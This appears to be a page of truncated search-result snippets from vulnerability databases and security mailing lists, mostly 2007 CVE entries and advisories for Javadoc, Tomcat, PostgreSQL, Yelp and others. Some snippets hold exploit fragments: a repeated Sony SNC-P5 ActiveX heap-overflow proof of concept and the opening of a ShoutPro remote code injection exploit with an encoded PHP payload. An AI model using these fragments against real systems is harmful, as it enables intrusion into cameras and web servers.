CVE-2007-3503

The CVE-2007-3503 issue affects Sun JDK 6 and JDK 5.0 Update 11 where the Javadoc tool can generate HTML documentation pages containing cross-site scripting (XSS). A remote attacker could inject arbitrary web script or HTML via unspecified vectors. Supported documents note this as part of broader...

sony-heap.txt

Sub tryMe buff = String15000, "A" viewer.PrmSetNetworkParam buff, 1 End Sub...

Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC

No description provided by source. !-- Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC Camera info http://bssc.sel.sony.com/BroadcastandBusiness/DisplayModel?id=79540 SNC-P5 External API documentation...

Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)

Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC Sub tryMe buff = String15000, "A" viewer.PrmSetNetworkParam buff, 1 End Sub milw0rm.com 2007-06-27...

Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)

Sub tryMe buff = String15000, "A" viewer.PrmSetNetworkParam buff, 1 End Sub milw0rm.com 2007-06-27...

[SECURITY] Fedora 7 Update: yelp-2.18.1-4.fc7

Yelp is the Gnome 2 help/documentation browser. It is designed to help you browse all the documentation on your system in one central tool...

[SECURITY] Fedora Core 5 Update: yelp-2.14.3-5.fc5

Yelp is the Gnome 2 help/documentation browser. It is designed to help you browse all the documentation on your system in one central tool...

[SECURITY] Fedora Core 6 Update: yelp-2.16.0-13.fc6

Yelp is the Gnome 2 help/documentation browser. It is designed to help you browse all the documentation on your system in one central tool...

[CVE-2007-1355] Tomcat documentation XSS vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2007-1355: Tomcat documentation XSS vulnerabilities Severity: Moderate Cross-site scripting Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.0.0 to 4.0.6 Tomcat 4.1.0 to 4.1.36 Tomcat 5.0.0 to 5.0.30 Tomcat 5.5.0 to 5.5.23 Tomcat...

Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities

Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/24058/info Apache Tomcat's documentation web application includes a sample application that is prone to multiple cross-site scripting vulnerabilities...

PostgreSQL: Privilege escalation

Background PostgreSQL is an open source object-relational database management system. Description An error involving insecure searchpath settings in the SECURITY DEFINER functions has been reported in PostgreSQL. Impact If allowed to call a SECURITY DEFINER function, an attacker could gain the SQ...

ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit

Exploit for unknown platform in category web applications =========================================================== ShoutPro ?php echo "...

ShoutPro 1.5.2 - &#039;shout.php&#039; Remote Code Injection

?php echo "\n"; echo " Special Greetings To - Timq,Warpboy,The-Maggot \n"; echo "\n\n\n"; //Writes Files - Under 100 bytes to meet requirements $temppayload = "%3C%3F%24a%3D...

ACLS ineffective in SQL-Ledger and LedgerSMB

Hi all; I have decided to finally send to this list a serious security flaw in the design of SQL-Ledger all versions. LedgerSMB all versions is also affected but the problem with a workaround has been mentioned in our documentation since the fork. Ordinarily I would not make a big deal out of thi...

Nine Vista CVEs, including Microsoft inaccurate Teredo use case documentation

Hello all, In my blog today 1 I give a brief run-down of nine CVE entries that were recently published for Vista; the CVEs are numbered CVE-2007-1527 through CVE-2007-1535. At this point, I do not know who requested the entries be created. However, the entries are based on items reported in...

CVE-2007-1535

Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo...

[SECURITY] Fedora Core 5 Update: yelp-2.14.3-4.fc5

Yelp is the Gnome 2 help/documentation browser. It is designed to help you browse all the documentation on your system in one central tool...

[SECURITY] Fedora Core 6 Update: postgresql-8.1.7-1.fc6

PostgreSQL is an advanced Object-Relational database management system DBMS that supports almost all SQL constructs including transactions, subselects and user-defined types and functions. The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DB...

Remote file inclusion

PHP remote file inclusion vulnerability in install.php in Somery 0.4.6 allows remote attackers to execute arbitrary PHP code via a URL in the skindir parameter, a different vector than CVE-2006-4669. NOTE: the documentation says to remove install.php after installation...

CVE-2007-0704

PHP remote file inclusion vulnerability in install.php in Somery 0.4.6 allows remote attackers to execute arbitrary PHP code via a URL in the skindir parameter, a different vector than CVE-2006-4669. NOTE: the documentation says to remove install.php after installation...